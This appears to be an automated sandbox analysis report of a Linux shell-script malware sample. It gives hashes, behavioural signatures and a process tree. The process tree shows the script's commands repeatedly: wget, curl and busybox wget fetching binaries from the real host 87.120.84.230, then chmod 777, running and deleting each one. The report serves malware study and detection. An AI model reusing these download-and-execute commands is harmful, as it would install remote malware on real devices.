Analysis
-
max time kernel
17s -
max time network
19s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
01-11-2024 03:04
Static task
static1
Behavioral task
behavioral1
Sample
3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh
-
Size
10KB
-
MD5
e54d8700e6358f16715e8ef228b233b5
-
SHA1
2ca2659f90f6049ca61904ab718ac6977d98c158
-
SHA256
3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a
-
SHA512
bba349a7c47bf864182506b7566ffc31187f0172c915e774a999667b78c355711f5ef30944d0f3dd57b98f2c8aa937245bcf994b33703011343d9f85a71dfbb7
-
SSDEEP
192:W8dUisZBCCvOjsl9/7IJxxMCCvOyi/7IJxxUx:W8dJeBCCvOjslJCCvOy7O
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 755 chmod 778 chmod 790 chmod 802 chmod 772 chmod 822 chmod 667 chmod 710 chmod 796 chmod 814 chmod 684 chmod 730 chmod 784 chmod 808 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7 668 IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7 /tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs 686 WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs /tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame 712 X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame /tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo 732 UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo /tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l 757 Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l /tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX 773 Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX /tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU 779 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU /tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb 785 h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb /tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu 791 NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu /tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt 797 WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt /tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu 803 gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu /tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS 809 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS /tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM 815 wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM /tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u 823 IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u -
Checks CPU configuration 1 TTPs 14 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 14 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo curl File opened for modification /tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu curl File opened for modification /tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u curl File opened for modification /tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame curl File opened for modification /tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU curl File opened for modification /tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb curl File opened for modification /tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu curl File opened for modification /tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt curl File opened for modification /tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7 curl File opened for modification /tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX curl File opened for modification /tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS curl File opened for modification /tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs curl File opened for modification /tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l curl File opened for modification /tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM curl
Processes
-
/tmp/3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh/tmp/3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh1⤵PID:633
-
/bin/rm/bin/rm bins.sh2⤵PID:635
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵PID:641
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:658
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵PID:665
-
-
/bin/chmodchmod 777 IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- File and Directory Permissions Modification
PID:667
-
-
/tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7./IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- Executes dropped EXE
PID:668
-
-
/bin/rmrm IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵PID:669
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵PID:670
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:671
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵PID:677
-
-
/bin/chmodchmod 777 WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- File and Directory Permissions Modification
PID:684
-
-
/tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs./WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- Executes dropped EXE
PID:686
-
-
/bin/rmrm WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵PID:687
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵PID:688
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:697
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵PID:704
-
-
/bin/chmodchmod 777 X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- File and Directory Permissions Modification
PID:710
-
-
/tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame./X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- Executes dropped EXE
PID:712
-
-
/bin/rmrm X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵PID:713
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵PID:714
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:728
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵PID:729
-
-
/bin/chmodchmod 777 UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- File and Directory Permissions Modification
PID:730
-
-
/tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo./UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- Executes dropped EXE
PID:732
-
-
/bin/rmrm UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵PID:734
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵PID:735
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:742
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵PID:748
-
-
/bin/chmodchmod 777 Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l./Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- Executes dropped EXE
PID:757
-
-
/bin/rmrm Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵PID:758
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵PID:759
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:766
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵PID:771
-
-
/bin/chmodchmod 777 Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX./Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- Executes dropped EXE
PID:773
-
-
/bin/rmrm Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵PID:774
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵PID:775
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:776
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵PID:777
-
-
/bin/chmodchmod 777 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU./0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- Executes dropped EXE
PID:779
-
-
/bin/rmrm 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵PID:780
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:781
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:782
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:783
-
-
/bin/chmodchmod 777 h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb./h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- Executes dropped EXE
PID:785
-
-
/bin/rmrm h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:786
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵PID:787
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:788
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵PID:789
-
-
/bin/chmodchmod 777 NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- File and Directory Permissions Modification
PID:790
-
-
/tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu./NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- Executes dropped EXE
PID:791
-
-
/bin/rmrm NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵PID:792
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵PID:793
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:794
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵PID:795
-
-
/bin/chmodchmod 777 WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt./WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵PID:798
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵PID:799
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵PID:801
-
-
/bin/chmodchmod 777 gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu./gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- Executes dropped EXE
PID:803
-
-
/bin/rmrm gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵PID:804
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵PID:805
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵PID:807
-
-
/bin/chmodchmod 777 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS./32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵PID:810
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵PID:811
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵PID:813
-
-
/bin/chmodchmod 777 wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM./wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵PID:816
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:817
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:821
-
-
/bin/chmodchmod 777 IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u./IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:824
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵PID:825
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97